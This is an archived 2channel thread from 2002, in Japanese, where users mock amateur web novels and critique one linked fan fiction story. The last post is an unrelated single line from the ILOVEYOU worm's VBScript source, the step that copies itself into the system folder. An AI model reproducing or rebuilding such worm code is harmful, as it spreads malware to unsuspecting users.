5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【正しい】ネット小説批評スレ【日本語】

1 :名無しさん@どーでもいいことだが。:02/06/24 00:43 ID:YcdRggEs
インターネットで発見した、間違った方向に面白い小説を紹介、批評するスレッドです。

※鉄則※
・紹介されたサイトへの乗り込み禁止!
・とりあえずURLは「h」抜き・・
・sage進行でお願いします。


2 ::02/06/24 00:46 ID:zVl1bJ8v
私怨うざい。

3 :名無しさん@どーでもいいことだが。:02/06/24 00:55 ID:SJFrd91J
批評人さんお願いします
ttp://www.geocities.co.jp/Playtown-Denei/5789/syousetu/yomimono/madousi1.htm


4 :名無しさん@どーでもいいことだが。:02/06/24 01:06 ID:eeKgfx3C
>エアリスの家には・・・エアリス、エアリスの母イファルナ、イファルナの母(エアリスの祖母)エルミナ。
>ついでに上からエアリス、イファルナ、エアリス、エルミナ、イファルナ、エルミナである。

俺にはこの辺の意味がわからんのだが・・誰か解説しる!

5 :名無しさん@どーでもいいことだが。:02/06/24 01:08 ID:w9cxPHKR
電波SS晒し上げ

6 :名無しさん@どーでもいいことだが。:02/06/24 01:11 ID:F1Pq6Yi1
散々ガイシュツくさいが、『・』をつなげて『…』の代わりにするのはやめろ

7 :名無しさん@どーでもいいことだが。:02/06/24 18:45 ID:KkPjly27
>>3
まず行をそろえろ。
右いったり左いったり読みにくい。
空行も多すぎ。それからギャグなのかなんなのかわからないが文字を大きくして強調してあると逆に萎える。
極め付けは座談会。自分も登場か。おめでてーな。


8 :名無しさん@どーでもいいことだが。:02/07/09 17:14 ID:3RoOQSaS
10レスもつかないようなスレで「sage進行でお願いします」か(藁

9 :名無しさん@どーでもいいことだが。:02/07/12 18:49 ID:K5T3X5c9
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

2 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)